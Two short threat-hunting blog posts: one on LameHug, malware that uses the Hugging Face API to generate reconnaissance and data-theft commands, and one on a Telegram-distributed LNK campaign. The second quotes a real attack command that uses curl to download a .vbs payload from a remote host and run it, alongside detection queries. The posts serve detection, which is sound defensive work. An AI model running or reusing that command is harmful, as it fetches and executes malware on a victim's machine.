Know Your Adversary

Hello everyone! Finally, an interesting case of LLM abuse! I'm talking about LameHug . The malware relies on the Hugging Face API to generate commands according to given prompts. For example, the malware used LLM to generate reconnaissance and data theft commands. LameHug is distributed vis phishing emails. Attached archives contain PIF files, for example.  So, we can check for any PIF files resolving Hugging Face related domains: event_type: "dnsreqwin" AND dns_rname: *huggingface* AND proc_file_path: *pif Also a good idea would be to profile communications with Hugging Face API to exclude known-good and be able to detect suspicious events. See you tomorrow! 

Hello everyone! I'm sure you already use LLMs to solve various security-related tasks. So do adversaries! For example, let's look at a campaign uncovered by Qianxin Threat Intelligence Center. The threat actors used Telegram to distribute archives with malicious LNK-files. These files abused cURL to download a malicious .vbs file from a remote server, for example: C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs" Here we have a nice hunting opportunity: event_type: "processcreatewin" AND proc_file_name: "curl.exe" AND cmdline: "vbs" So, if we look inside the .vbs file, we can see that it's very similar to those created with LLMs! That's it! See you tomorrow!